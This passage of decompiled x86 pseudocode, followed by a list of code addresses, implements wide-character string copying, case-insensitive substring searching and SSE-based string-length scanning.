												_t463 =  *(_t323 + _t502 * 4 - 2) & 0x0000ffff;
												 *(_t406 + _t502 * 4 - 2) = _t463;
												if(_t463 == 0) {
													goto L45;
												}
												_t464 =  *(_t323 + _t502 * 4) & 0x0000ffff;
												 *(_t406 + _t502 * 4) = _t464;
												if(_t464 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t330 =  *_t582 & 0x0000ffff;
										if(_t330 != 0) {
											_t554 =  *_t405;
											__eflags = _t554;
											if(_t554 == 0) {
												L52:
												_t503 = _a4;
												_push(0x80);
												 *_t503 = 0;
												 *((intOrPtr*)(_t503 + 4)) = 0;
												_t406 = E6EA01030();
												_t614 =  &(_t614[1]);
												_t334 =  *_a4;
												__eflags = _t334;
												if(_t334 == 0) {
													__eflags = 0;
													 *_t406 = 0;
													goto L60;
												}
												__eflags = _t406;
												if(_t406 == 0) {
													L58:
													_push(2);
													_push(_t334);
													E6EA010B0();
													_t614 =  &(_t614[2]);
													goto L60;
												}
												_t504 =  *_t334 & 0x0000ffff;
												 *_t406 = _t504;
												__eflags = _t504;
												if(_t504 == 0) {
													goto L58;
												}
												_t505 = 0;
												__eflags = 0;
												while(1) {
													_t505 = _t505 + 1;
													_t465 =  *(_t334 + _t505 * 4 - 2) & 0x0000ffff;
													 *(_t406 + _t505 * 4 - 2) = _t465;
													__eflags = _t465;
													if(_t465 == 0) {
														goto L58;
													}
													_t466 =  *(_t334 + _t505 * 4) & 0x0000ffff;
													 *(_t406 + _t505 * 4) = _t466;
													__eflags = _t466;
													if(_t466 != 0) {
														continue;
													}
													goto L58;
												}
												goto L58;
											}
											__eflags =  *_t554 & 0x0000ffff;
											if(( *_t554 & 0x0000ffff) == 0) {
												goto L52;
											}
											_v24 = _t582;
											__eflags = _t330 - 0x41 - 0x19;
											_t337 =  <=  ? _t330 + 0x20 : _t330;
											_t508 = 0;
											__eflags = 0;
											_t338 = ( <=  ? _t330 + 0x20 : _t330) & 0x0000ffff;
											_v44 = _t338;
											while(1) {
												_t584 =  *(_t554 + _t508 * 2) & 0x0000ffff;
												_t67 = _t584 - 0x41; // 0x7fffffbe
												__eflags = _t67 - 0x19;
												_t68 = _t584 + 0x20; // 0x8000001f
												_t585 =  <=  ? _t68 :  *(_t554 + _t508 * 2) & 0x0000ffff;
												__eflags = ( <=  ? _t68 :  *(_t554 + _t508 * 2) & 0x0000ffff) - _t338;
												if(( <=  ? _t68 :  *(_t554 + _t508 * 2) & 0x0000ffff) == _t338) {
													break;
												}
												_t508 = _t508 + 1;
												__eflags =  *(_t554 + _t508 * 2) & 0x0000ffff;
												if(( *(_t554 + _t508 * 2) & 0x0000ffff) != 0) {
													continue;
												}
												goto L52;
											}
											_t586 = _v24;
											_t469 = _t554 + _t508 * 2;
											__eflags = _t469;
											if(_t469 == 0) {
												goto L52;
											}
											_t510 = _t586 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_t340 = _t510 & 0x00000001;
											_t412 =  ~_t510 + 0x10 >> 1;
											_v52 = _t412;
											_v36 = _t554;
											_v24 = _t586;
											_t555 = _t412;
											while(1) {
												L68:
												_t587 = _t510;
												__eflags = _t510;
												if(_t510 == 0) {
													goto L74;
												}
												_t421 = 0;
												__eflags = _t340;
												if(_t340 != 0) {
													L78:
													_v28 = _t340;
													_t603 = _v24;
													while(1) {
														__eflags =  *(_t603 + _t421 * 2) & 0x0000ffff;
														if(( *(_t603 + _t421 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t421 = _t421 + 1;
														__eflags = _t421 - 0x7fffffff;
														if(_t421 < 0x7fffffff) {
															continue;
														}
														_v24 = _t603;
														_t341 = _v28;
														L82:
														_t421 = 0x7fffffff;
														L83:
														 *_t614 = _t421;
														_t588 = 0;
														__eflags = 0;
														_v32 = _t510;
														_v28 = _t341;
														while(1) {
															_t422 =  *(_t469 + _t588 * 2) & 0x0000ffff;
															_t124 = _t422 - 0x61; // 0x7fffff9e
															_t559 =  *(_v24 + _t588 * 2) & 0x0000ffff;
															__eflags = _t124 - 0x19;
															_t127 = _t422 - 0x20; // 0x7fffffdf
															_t423 =  <=  ? _t127 :  *(_t469 + _t588 * 2) & 0x0000ffff;
															_t343 = ( <=  ? _t127 :  *(_t469 + _t588 * 2) & 0x0000ffff) & 0x0000ffff;
															__eflags = _t559 - 0x61 - 0x19;
															_t560 =  <=  ? _t559 - 0x20 : _t559;
															__eflags = _t343 - ( <=  ? _t559 - 0x20 : _t559);
															if(__eflags < 0 || __eflags > 0) {
																break;
															}
															__eflags = _t343;
															if(_t343 == 0) {
																L88:
																_t510 = _v32;
																_t341 = _v28;
																_t563 = _v36;
																_t591 = _v24;
																L89:
																__eflags = _t469;
																if(_t469 == 0) {
																	goto L52;
																}
																_v28 = _t341;
																_v36 = _t563;
																_v24 = _t591;
																_t592 = 0;
																__eflags = 0;
																while(1) {
																	L91:
																	_t564 = _t469;
																	_t349 = _t469 + 2;
																	__eflags = _t349;
																	if(_t349 == 0) {
																		break;
																	}
																	__eflags =  *(_t469 + 2) & 0x0000ffff;
																	if(( *(_t469 + 2) & 0x0000ffff) == 0) {
																		break;
																	}
																	 *_t614 = _t564;
																	_t443 = _t592;
																	_v32 = _t510;
																	while(1) {
																		_t443 = _t443 + 1;
																		_t596 = _t469 + _t443 * 2;
																		_t537 =  *_t596 & 0x0000ffff;
																		__eflags = ( *(_t349 + _t443 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
																		_v48 = _t596;
																		_t538 =  <=  ? _t537 + 0x20 : _t537;
																		__eflags = ( <=  ? _t537 + 0x20 : _t537) - _v44;
																		if(( <=  ? _t537 + 0x20 : _t537) == _v44) {
																			break;
																		}
																		__eflags =  *(_t349 + _t443 * 2) & 0x0000ffff;
																		if(( *(_t349 + _t443 * 2) & 0x0000ffff) != 0) {
																			continue;
																		}
																		L96:
																		_t510 = _v32;
																		_t350 = _v28;
																		_t565 = _v36;
																		_t593 = _v24;
																		L97:
																		__eflags = _t510;
																		if(_t510 == 0) {
																			L102:
																			_t476 =  ~( ~_t510 + 0x00000007 & 0x00000007) + 0x7fffffff;
																			__eflags = _t476;
																			while(1) {
																				asm("movdqu xmm1, [esi+edx*2]");
																				asm("pcmpeqw xmm1, xmm0");
																				asm("pmovmskb eax, xmm1");
																				__eflags = _t350;
																				if(_t350 != 0) {
																					break;
																				}
																				_t510 = _t510 + 8;
																				__eflags = _t510 - _t476;
																				if(_t510 < _t476) {
																					continue;
																				}
																				__eflags = _t476 - 0x7fffffff;
																				if(_t476 >= 0x7fffffff) {
																					L108:
																					_t476 = 0x7fffffff;
																					L109:
																					_t352 = _t565 & 0x0000000f;
																					__eflags = _t352;
																					if(_t352 == 0) {
																						L114:
																						_t432 =  ~( ~_t352 + 0x00000007 & 0x00000007) + 0x7fffffff;
																						__eflags = _t432;
																						while(1) {
																							asm("movdqu xmm1, [edi+eax*2]");
																							asm("pcmpeqw xmm1, xmm0");
																							asm("pmovmskb edx, xmm1");
																							__eflags = _t510;
																							if(_t510 != 0) {
																								break;
																							}
																							_t352 = _t352 + 8;
																							__eflags = _t352 - _t432;
																							if(_t352 < _t432) {
																								continue;
																							}
																							__eflags = _t432 - 0x7fffffff;
																							if(_t432 >= 0x7fffffff) {
																								L120:
																								_t432 = 0x7fffffff;
																								L121:
																								_t594 = _a4;
																								_t518 =  *_t614 - _t565 + _t476 * 2 >> 1;
																								__eflags = _t518;
																								 *_t594 = 0;
																								_t519 =  <=  ? 0 : _t518;
																								__eflags = _t432 - _t519;
																								 *((intOrPtr*)(_t594 + 4)) = 0;
																								_t520 =  <  ? _t432 : _t519;
																								_t434 = _t432 - _t520;
																								_t566 = _t565 + _t520 * 2;
																								__eflags = _t566;
																								if(_t566 == 0) {
																									L156:
																									_push(0x80);
																									_t406 = E6EA01030();
																									_t614 =  &(_t614[1]);
																									_t357 =  *_a4;
																									__eflags = _t357;
																									if(_t357 == 0) {
																										 *_t406 = 0;
																										goto L60;
																									}
																									__eflags = _t406;
																									if(_t406 == 0) {
																										L162:
																										_push(2);
																										_push(_t357);
																										E6EA010B0();
																										_t614 =  &(_t614[2]);
																										goto L60;
																									}
																									_t521 =  *_t357 & 0x0000ffff;
																									 *_t406 = _t521;
																									__eflags = _t521;
																									if(_t521 == 0) {
																										goto L162;
																									}
																									_t522 = 0;
																									__eflags = 0;
																									while(1) {
																										_t522 = _t522 + 1;
																										_t479 =  *(_t357 + _t522 * 4 - 2) & 0x0000ffff;
																										 *(_t406 + _t522 * 4 - 2) = _t479;
																										__eflags = _t479;
																										if(_t479 == 0) {
																											goto L162;
																										}
																										_t480 =  *(_t357 + _t522 * 4) & 0x0000ffff;
																										 *(_t406 + _t522 * 4) = _t480;
																										__eflags = _t480;
																										if(_t480 != 0) {
																											continue;
																										}
																										goto L162;
																									}
																									goto L162;
																								}
																								_t360 =  *_t566 & 0x0000ffff;
																								__eflags = _t360;
																								if(_t360 == 0) {
																									goto L156;
																								}
																								__eflags = _t434;
																								if(_t434 != 0) {
																									L136:
																									_t176 = _t434 + 1; // 0x80000000
																									_t523 = _t176;
																									__eflags = _t523 - 0x40;
																									_t524 =  <=  ? 0x40 : _t523;
																									__eflags = _t524;
																									if(_t524 > 0) {
																										_t366 = (_t524 >> 5 >> 0x1a) + _t524 >> 6;
																										_t525 = _t524 & 0x8000003f;
																										__eflags = _t525;
																										if(_t525 < 0) {
																											_t525 = (_t525 - 0x00000001 | 0xffffffc0) + 1;
																											__eflags = _t525;
																										}
																										__eflags = _t525;
																										_t367 = _t366 + (0 | _t525 > 0x00000000);
																										 *_t614 = _t367 << 6;
																										_push(_t367 << 7);
																										_t595 = E6EA01030();
																										_t614 =  &(_t614[1]);
																										_t528 =  *_a4;
																										__eflags = _t528;
																										if(_t528 == 0) {
																											__eflags = 0;
																											 *_t595 = 0;
																											goto L148;
																										} else {
																											__eflags = _t595;
																											if(_t595 == 0) {
																												L146:
																												_push(2);
																												_push(_t528);
																												E6EA010B0();
																												_t614 =  &(_t614[2]);
																												L148:
																												_t529 = _a4;
																												_t529[1] =  *_t614;
																												 *_t529 = _t595;
																												L149:
																												__eflags = _t595;
																												if(_t595 == 0) {
																													goto L61;
																												}
																												_t373 = 0;
																												while(1) {
																													_t530 =  *_t566 & 0x0000ffff;
																													_t373 = _t373 + 1;
																													 *_t595 = _t530;
																													__eflags = _t434;
																													if(_t434 == 0) {
																														goto L154;
																													}
																													__eflags = _t373 - _t434;
																													if(_t373 == _t434) {
																														 *(_t595 + 2) = 0;
																														goto L61;
																													}
																													L154:
																													__eflags = _t530;
																													if(_t530 == 0) {
																														goto L61;
																													}
																													_t595 = _t595 + 2;
																													_t566 = _t566 + 2;
																													__eflags = _t566;
																												}
																											}
																											_t376 =  *_t528 & 0x0000ffff;
																											 *_t595 = _t376;
																											__eflags = _t376;
																											if(_t376 == 0) {
																												goto L146;
																											}
																											_t377 = 0;
																											__eflags = 0;
																											while(1) {
																												_t377 = _t377 + 1;
																												_t483 =  *(_t528 + _t377 * 4 - 2) & 0x0000ffff;
																												 *(_t595 + _t377 * 4 - 2) = _t483;
																												__eflags = _t483;
																												if(_t483 == 0) {
																													goto L146;
																												}
																												_t484 =  *(_t528 + _t377 * 4) & 0x0000ffff;
																												 *(_t595 + _t377 * 4) = _t484;
																												__eflags = _t484;
																												if(_t484 != 0) {
																													continue;
																												}
																												goto L146;
																											}
																											goto L146;
																										}
																									}
																									_t595 = 0;
																									goto L149;
																								}
																								_t534 = _t566 & 0x0000000f;
																								__eflags = _t534;
																								if(_t534 == 0) {
																									L129:
																									_t434 =  ~( ~_t534 + 0x00000007 & 0x00000007) + 0x7fffffff;
																									__eflags = _t434;
																									while(1) {
																										asm("movdqu xmm1, [edi+edx*2]");
																										asm("pcmpeqw xmm1, xmm0");
																										asm("pmovmskb eax, xmm1");
																										__eflags = _t360;
																										if(_t360 != 0) {
																											break;
																										}
																										_t534 = _t534 + 8;
																										__eflags = _t534 - _t434;
																										if(_t534 < _t434) {
																											continue;
																										}
																										__eflags = _t434 - 0x7fffffff;
																										if(_t434 >= 0x7fffffff) {
																											L135:
																											_t434 = 0x7fffffff;
																											goto L136;
																										} else {
																											goto L133;
																										}
																										while(1) {
																											L133:
																											__eflags =  *(_t566 + _t434 * 2) & 0x0000ffff;
																											if(( *(_t566 + _t434 * 2) & 0x0000ffff) == 0) {
																												goto L136;
																											}
																											_t434 = _t434 + 1;
																											__eflags = _t434 - 0x7fffffff;
																											if(_t434 < 0x7fffffff) {
																												continue;
																											}
																											goto L135;
																										}
																										goto L136;
																									}
																									asm("bsf ebx, eax");
																									_t434 = (_t434 >> 1) + _t534;
																									goto L136;
																								}
																								_t434 = 0;
																								__eflags = _t534 & 0x00000001;
																								if((_t534 & 0x00000001) != 0) {
																									goto L133;
																								}
																								_t534 =  ~_t534 + 0x10 >> 1;
																								__eflags = _t534;
																								while(1) {
																									_t360 =  *(_t566 + _t434 * 2) & 0x0000ffff;
																									__eflags = _t360;
																									if(_t360 == 0) {
																										goto L136;
																									}
																									_t434 = _t434 + 1;
																									__eflags = _t434 - _t534;
																									if(_t434 < _t534) {
																										continue;
																									}
																									goto L129;
																								}
																								goto L136;
																							} else {
																								goto L118;
																							}
																							while(1) {
																								L118:
																								__eflags =  *(_t565 + _t432 * 2) & 0x0000ffff;
																								if(( *(_t565 + _t432 * 2) & 0x0000ffff) == 0) {
																									goto L121;
																								}
																								_t432 = _t432 + 1;
																								__eflags = _t432 - 0x7fffffff;
																								if(_t432 < 0x7fffffff) {
																									continue;
																								}
																								goto L120;
																							}
																							goto L121;
																						}
																						asm("bsf ebx, edx");
																						_t432 = (_t432 >> 1) + _t352;
																						goto L121;
																					}
																					_t432 = 0;
																					__eflags = _t352 & 0x00000001;
																					if((_t352 & 0x00000001) != 0) {
																						goto L118;
																					}
																					_t352 =  ~_t352 + 0x10 >> 1;
																					__eflags = _t352;
																					while(1) {
																						_t510 =  *(_t565 + _t432 * 2) & 0x0000ffff;
																						__eflags = _t510;
																						if(_t510 == 0) {
																							goto L121;
																						}
																						_t432 = _t432 + 1;
																						__eflags = _t432 - _t352;
																						if(_t432 < _t352) {
																							continue;
																						}
																						goto L114;
																					}
																					goto L121;
																				} else {
																					goto L106;
																				}
																				while(1) {
																					L106:
																					__eflags =  *(_t593 + _t476 * 2) & 0x0000ffff;
																					if(( *(_t593 + _t476 * 2) & 0x0000ffff) == 0) {
																						goto L109;
																					}
																					_t476 = _t476 + 1;
																					__eflags = _t476 - 0x7fffffff;
																					if(_t476 < 0x7fffffff) {
																						continue;
																					}
																					goto L108;
																				}
																				goto L109;
																			}
																			asm("bsf ecx, eax");
																			_t476 = (_t476 >> 1) + _t510;
																			goto L109;
																		}
																		_t476 = 0;
																		__eflags = _t350;
																		if(_t350 != 0) {
																			goto L106;
																		}
																		_t510 = _v52;
																		_t441 = _t510;
																		while(1) {
																			_t350 =  *(_t593 + _t476 * 2) & 0x0000ffff;
																			__eflags = _t350;
																			if(_t350 == 0) {
																				goto L109;
																			}
																			_t476 = _t476 + 1;
																			__eflags = _t476 - _t441;
																			if(_t476 < _t441) {
																				continue;
																			}
																			goto L102;
																		}
																		goto L109;
																	}
																	_t485 = _v48;
																	_t510 = _v32;
																	_t570 = _v52;
																	_t383 = _v28;
																	while(1) {
																		_t598 = _t510;
																		__eflags = _t510;
																		if(_t510 == 0) {
																			goto L180;
																		}
																		L175:
																		_t452 = 0;
																		__eflags = _t383;
																		if(_t383 != 0) {
																			L184:
																			_v28 = _t383;
																			_t602 = _v24;
																			while(1) {
																				__eflags =  *(_t602 + _t452 * 2) & 0x0000ffff;
																				if(( *(_t602 + _t452 * 2) & 0x0000ffff) == 0) {
																					break;
																				}
																				_t452 = _t452 + 1;
																				__eflags = _t452 - 0x7fffffff;
																				if(_t452 < 0x7fffffff) {
																					continue;
																				}
																				_v24 = _t602;
																				_t384 = _v28;
																				L188:
																				_t452 = 0x7fffffff;
																				L189:
																				_v56 = _t452;
																				_t599 = 0;
																				__eflags = 0;
																				_v32 = _t510;
																				_v28 = _t384;
																				while(1) {
																					_t453 =  *(_t485 + _t599 * 2) & 0x0000ffff;
																					_t241 = _t453 - 0x61; // 0x7fffff9e
																					_t574 =  *(_v24 + _t599 * 2) & 0x0000ffff;
																					__eflags = _t241 - 0x19;
																					_t244 = _t453 - 0x20; // 0x7fffffdf
																					_t454 =  <=  ? _t244 :  *(_t485 + _t599 * 2) & 0x0000ffff;
																					_t386 = ( <=  ? _t244 :  *(_t485 + _t599 * 2) & 0x0000ffff) & 0x0000ffff;
																					__eflags = _t574 - 0x61 - 0x19;
																					_t575 =  <=  ? _t574 - 0x20 : _t574;
																					__eflags = _t386 - ( <=  ? _t574 - 0x20 : _t574);
																					if(__eflags < 0 || __eflags > 0) {
																						break;
																					}
																					__eflags = _t386;
																					if(_t386 == 0) {
																						L194:
																						_t564 =  *_t614;
																						_t592 = _t599 ^ _t599;
																						__eflags = _t592;
																						_t510 = _v32;
																						L195:
																						__eflags = _t485;
																						if(_t485 != 0) {
																							goto L91;
																						}
																						goto L196;
																					}
																					_t599 = _t599 + 1;
																					__eflags = _t599 - _v56;
																					if(_t599 < _v56) {
																						continue;
																					}
																					goto L194;
																				}
																				_t510 = _v32;
																				_t350 = _v28;
																				_t601 = _t485 + 2;
																				__eflags = _t601;
																				if(_t601 == 0) {
																					L207:
																					_t565 = _v36;
																					_t593 = _v24;
																					goto L97;
																				}
																				__eflags =  *(_t485 + 2) & 0x0000ffff;
																				if(( *(_t485 + 2) & 0x0000ffff) == 0) {
																					goto L207;
																				}
																				_v40 = _t485;
																				_t457 = 0;
																				__eflags = 0;
																				_v32 = _t510;
																				_v28 = _t350;
																				while(1) {
																					_t457 = _t457 + 1;
																					_t485 = _v40 + _t457 * 2;
																					_t387 =  *_t485 & 0x0000ffff;
																					__eflags = ( *(_t601 + _t457 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
																					_t388 =  <=  ? _t387 + 0x20 : _t387;
																					__eflags = ( <=  ? _t387 + 0x20 : _t387) - _v44;
																					if(( <=  ? _t387 + 0x20 : _t387) == _v44) {
																						break;
																					}
																					__eflags =  *(_t601 + _t457 * 2) & 0x0000ffff;
																					if(( *(_t601 + _t457 * 2) & 0x0000ffff) != 0) {
																						continue;
																					}
																					goto L96;
																				}
																				_t510 = _v32;
																				_t570 = _v52;
																				_t383 = _v28;
																				_t598 = _t510;
																				__eflags = _t510;
																				if(_t510 == 0) {
																					goto L180;
																				}
																				goto L175;
																			}
																			_v24 = _t602;
																			_t384 = _v28;
																			L198:
																			__eflags = _t452;
																			if(__eflags == 0) {
																				goto L188;
																			}
																			if(__eflags > 0) {
																				goto L189;
																			}
																			_v28 = _t384;
																			_t592 = 0;
																			_t564 =  *_t614;
																			goto L195;
																		}
																		_v32 = _t510;
																		_t598 = _t570;
																		_v28 = _t383;
																		_t544 = _v24;
																		while(1) {
																			__eflags =  *(_t544 + _t452 * 2) & 0x0000ffff;
																			if(( *(_t544 + _t452 * 2) & 0x0000ffff) == 0) {
																				break;
																			}
																			_t452 = _t452 + 1;
																			__eflags = _t452 - _t570;
																			if(_t452 < _t570) {
																				continue;
																			}
																			_v24 = _t544;
																			_t510 = _v32;
																			_t383 = _v28;
																			goto L180;
																		}
																		_v24 = _t544;
																		_t510 = _v32;
																		_t384 = _v28;
																		goto L198;
																		L180:
																		_v28 = _t383;
																		_t449 =  ~( ~_t598 + 0x00000007 & 0x00000007) + 0x7fffffff;
																		__eflags = _t449;
																		_t571 = _v24;
																		while(1) {
																			asm("movdqu xmm1, [edi+esi*2]");
																			asm("pcmpeqw xmm1, xmm0");
																			asm("pmovmskb eax, xmm1");
																			__eflags = _t383;
																			if(_t383 != 0) {
																				break;
																			}
																			_t598 = _t598 + 8;
																			__eflags = _t598 - _t449;
																			if(_t598 < _t449) {
																				continue;
																			}
																			_v24 = _t571;
																			_t384 = _v28;
																			__eflags = _t449 - 0x7fffffff;
																			if(_t449 >= 0x7fffffff) {
																				goto L188;
																			}
																			goto L184;
																		}
																		asm("bsf ebx, ebx");
																		_v24 = _t571;
																		_t452 = (_t383 >> 1) + _t598;
																		_t384 = _v28;
																		goto L198;
																	}
																}
																L196:
																 *_t614 = _t564;
																_t350 = _v28;
																_t565 = _v36;
																_t593 = _v24;
																goto L97;
															}
															_t588 = _t588 + 1;
															__eflags = _t588 -  *_t614;
															if(_t588 <  *_t614) {
																continue;
															}
															goto L88;
														}
														_t513 = _v32;
														_t344 = _v28;
														_t590 = _t469 + 2;
														__eflags = _t590;
														if(_t590 == 0) {
															goto L52;
														}
														__eflags =  *(_t469 + 2) & 0x0000ffff;
														if(( *(_t469 + 2) & 0x0000ffff) == 0) {
															goto L52;
														}
														_v40 = _t469;
														_t426 = 0;
														__eflags = 0;
														_v32 = _t513;
														_v28 = _t344;
														while(1) {
															_t426 = _t426 + 1;
															_t469 = _v40 + _t426 * 2;
															_t345 =  *_t469 & 0x0000ffff;
															__eflags = ( *(_t590 + _t426 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
															_t346 =  <=  ? _t345 + 0x20 : _t345;
															__eflags = ( <=  ? _t345 + 0x20 : _t345) - _v44;
															if(( <=  ? _t345 + 0x20 : _t345) == _v44) {
																break;
															}
															__eflags =  *(_t590 + _t426 * 2) & 0x0000ffff;
															if(( *(_t590 + _t426 * 2) & 0x0000ffff) != 0) {
																continue;
															}
															goto L52;
														}
														_t510 = _v32;
														_t555 = _v52;
														_t340 = _v28;
														goto L68;
													}
													_v24 = _t603;
													_t341 = _v28;
													L166:
													__eflags = _t421;
													if(__eflags == 0) {
														goto L82;
													}
													if(__eflags > 0) {
														goto L83;
													}
													_t563 = _v36;
													_t591 = _v24;
													goto L89;
												}
												_v32 = _t510;
												_t587 = _t555;
												_v28 = _t340;
												_t546 = _v24;
												while(1) {
													__eflags =  *(_t546 + _t421 * 2) & 0x0000ffff;
													if(( *(_t546 + _t421 * 2) & 0x0000ffff) == 0) {
														break;
													}
													_t421 = _t421 + 1;
													__eflags = _t421 - _t555;
													if(_t421 < _t555) {
														continue;
													}
													_v24 = _t546;
													_t510 = _v32;
													_t340 = _v28;
													goto L74;
												}
												_v24 = _t546;
												_t510 = _v32;
												_t341 = _v28;
												goto L166;
												L74:
												_v28 = _t340;
												_t418 =  ~( ~_t587 + 0x00000007 & 0x00000007) + 0x7fffffff;
												__eflags = _t418;
												_t556 = _v24;
												while(1) {
													asm("movdqu xmm1, [edi+esi*2]");
													asm("pcmpeqw xmm1, xmm0");
													asm("pmovmskb eax, xmm1");
													__eflags = _t340;
													if(_t340 != 0) {
														break;
													}
													_t587 = _t587 + 8;
													__eflags = _t587 - _t418;
													if(_t587 < _t418) {
														continue;
													}
													_v24 = _t556;
													_t341 = _v28;
													__eflags = _t418 - 0x7fffffff;
													if(_t418 >= 0x7fffffff) {
														goto L82;
													}
													goto L78;
												}
												asm("bsf ebx, ebx");
												_v24 = _t556;
												_t421 = (_t340 >> 1) + _t587;
												_t341 = _v28;
												goto L166;
											}
										}
										goto L39;
									}
									_t395 =  *_t498 & 0x0000ffff;
									 *_t552 = _t395;
									__eflags = _t395;
									if(_t395 == 0) {
										goto L33;
									}
									_t396 = 0;
									__eflags = 0;
									while(1) {
										_t396 = _t396 + 1;
										_t488 =  *(_t498 + _t396 * 4 - 2) & 0x0000ffff;
										 *(_t552 + _t396 * 4 - 2) = _t488;
										__eflags = _t488;
										if(_t488 == 0) {
											goto L33;
										}
										_t489 =  *(_t498 + _t396 * 4) & 0x0000ffff;
										 *(_t552 + _t396 * 4) = _t489;
										__eflags = _t489;
										if(_t489 != 0) {
											continue;
										}
										goto L33;
									}
									goto L33;
								}
							}
							_t552 = _v64;
							goto L36;
						}
						_t398 = _t551 & 0x0000000f;
						__eflags = _t398;
						if(_t398 == 0) {
							L16:
							asm("pxor xmm0, xmm0");
							_t609 =  ~( ~_t398 + 0x00000007 & 0x00000007) + 0x7fffffff;
							__eflags = _t609;
							while(1) {
								asm("movdqu xmm1, [edi+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb edx, xmm1");
								__eflags = _t492;
								if(_t492 != 0) {
									break;
								}
								_t398 = _t398 + 8;
								__eflags = _t398 - _t609;
								if(_t398 < _t609) {
									continue;
								}
								__eflags = _t609 - 0x7fffffff;
								if(_t609 >= 0x7fffffff) {
									L22:
									_t459 = 0x40;
									_t581 = 0x7fffffff;
									goto L23;
								} else {
									goto L20;
								}
								while(1) {
									L20:
									__eflags =  *(_t551 + _t609 * 2) & 0x0000ffff;
									if(( *(_t551 + _t609 * 2) & 0x0000ffff) == 0) {
										break;
									}
									_t609 = _t609 + 1;
									__eflags = _t609 - 0x7fffffff;
									if(_t609 < 0x7fffffff) {
										continue;
									}
									goto L22;
								}
								L62:
								__eflags = _t581 - 0xfffffffe;
								if(_t581 != 0xfffffffe) {
									_t459 = 0x40;
								} else {
									 *_t551 = 0;
									_t459 = _v60;
								}
								goto L23;
							}
							asm("bsf esi, edx");
							_t581 = (_t609 >> 1) + _t398;
							goto L62;
						}
						_t609 = 0;
						__eflags = _t398 & 0x00000001;
						if((_t398 & 0x00000001) != 0) {
							goto L20;
						}
						_t398 =  ~_t398 + 0x10 >> 1;
						__eflags = _t398;
						while(1) {
							_t492 =  *(_t551 + _t609 * 2) & 0x0000ffff;
							__eflags = _t492;
							if(_t492 == 0) {
								goto L62;
							}
							_t609 = _t609 + 1;
							__eflags = _t609 - _t398;
							if(_t609 < _t398) {
								continue;
							}
							goto L16;
						}
						goto L62;
					}
					_t319 =  &_v64;
					goto L37;
				}
				if(_t551 == 0) {
					L6:
					_push(2);
					_push(_t304);
					E6EA010B0();
					_t614 =  &(_t614[2]);
					goto L8;
				}
				_t492 =  *_t304 & 0x0000ffff;
				 *_t551 = _t492;
				if(_t492 == 0) {
					goto L6;
				}
				while(1) {
					_t492 = 1;
					_t490 = _t304[1] & 0x0000ffff;
					 *(_t551 + 2) = _t490;
					if(_t490 == 0) {
						goto L6;
					}
					_t491 = _t304[2] & 0x0000ffff;
					 *(_t551 + 4) = _t491;
					if(_t491 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x6ea0c59e
0x6ea0c5a2
0x6ea0c5a4
0x6ea0c5a8
0x6ea0c5b2
0x6ea0c5b4
0x6ea0c5b7
0x6ea0c5bd
0x6ea0c5f7
0x6ea0c5f9
0x6ea0c5fc
0x6ea0c600
0x6ea0c608
0x6ea0c60e
0x6ea0c619
0x6ea0c61b
0x6ea0d019
0x6ea0d01e
0x6ea0c69f
0x6ea0c6a4
0x6ea0c6a4
0x6ea0c6a7
0x6ea0c6aa
0x6ea0c6ad
0x6ea0c6af
0x6ea0c6c4
0x6ea0c6c7
0x6ea0c6c7
0x6ea0c6cd
0x6ea0c6d5
0x6ea0c6d5
0x6ea0c6d5
0x6ea0c6d6
0x6ea0c6e0
0x6ea0c6ea
0x6ea0c6ed
0x6ea0c6f3
0x6ea0c6f5
0x6ea0c6f8
0x6ea0c6fc
0x6ea0c6fe
0x6ea0c738
0x6ea0c73a
0x00000000
0x6ea0c700
0x6ea0c700
0x6ea0c702
0x6ea0c72b
0x6ea0c72b
0x6ea0c72d
0x6ea0c72e
0x6ea0c733
0x6ea0c73d
0x6ea0c740
0x6ea0c744
0x6ea0c748
0x6ea0c74c
0x6ea0c74e
0x6ea0c752
0x6ea0c758
0x6ea0c75d
0x6ea0c75d
0x6ea0c761
0x6ea0c76a
0x6ea0c76a
0x6ea0c76f
0x6ea0c774
0x6ea0c776
0x6ea0c77e
0x6ea0c780
0x6ea0c786
0x6ea0c78a
0x6ea0c7c9
0x6ea0c878
0x6ea0c878
0x6ea0c87b
0x6ea0c87d
0x6ea0c884
0x6ea0c884
0x6ea0c886
0x6ea0c88a
0x6ea0c894
0x6ea0c898
0x6ea0c8a8
0x6ea0c8a8
0x6ea0c78e
0x6ea0c7b7
0x6ea0c7b7
0x6ea0c7b9
0x6ea0c7ba
0x6ea0c7bf
0x00000000
0x6ea0c7bf
0x6ea0c790
0x6ea0c793
0x6ea0c798
0x00000000
0x00000000
0x6ea0c79a
0x6ea0c79c
0x6ea0c79c
0x6ea0c79d
0x6ea0c7a2
0x6ea0c7a9
0x00000000
0x00000000
0x6ea0c7ab
0x6ea0c7af
0x6ea0c7b5
0x00000000
0x00000000
0x00000000
0x6ea0c7b5
0x00000000
0x6ea0c79c
0x6ea0c763
0x6ea0c768
0x6ea0c7d1
0x6ea0c7d3
0x6ea0c7d5
0x6ea0c819
0x6ea0c819
0x6ea0c81e
0x6ea0c823
0x6ea0c825
0x6ea0c82d
0x6ea0c82f
0x6ea0c835
0x6ea0c837
0x6ea0c839
0x6ea0c873
0x6ea0c875
0x00000000
0x6ea0c875
0x6ea0c83b
0x6ea0c83d
0x6ea0c866
0x6ea0c866
0x6ea0c868
0x6ea0c869
0x6ea0c86e
0x00000000
0x6ea0c86e
0x6ea0c83f
0x6ea0c842
0x6ea0c845
0x6ea0c847
0x00000000
0x00000000
0x6ea0c849
0x6ea0c849
0x6ea0c84b
0x6ea0c84b
0x6ea0c84c
0x6ea0c851
0x6ea0c856
0x6ea0c858
0x00000000
0x00000000
0x6ea0c85a
0x6ea0c85e
0x6ea0c862
0x6ea0c864
0x00000000
0x00000000
0x00000000
0x6ea0c864
0x00000000
0x6ea0c84b
0x6ea0c7da
0x6ea0c7dc
0x00000000
0x00000000
0x6ea0c7de
0x6ea0c7e5
0x6ea0c7eb
0x6ea0c7ee
0x6ea0c7ee
0x6ea0c7f0
0x6ea0c7f3
0x6ea0c7f7
0x6ea0c7f7
0x6ea0c7fb
0x6ea0c7fe
0x6ea0c801
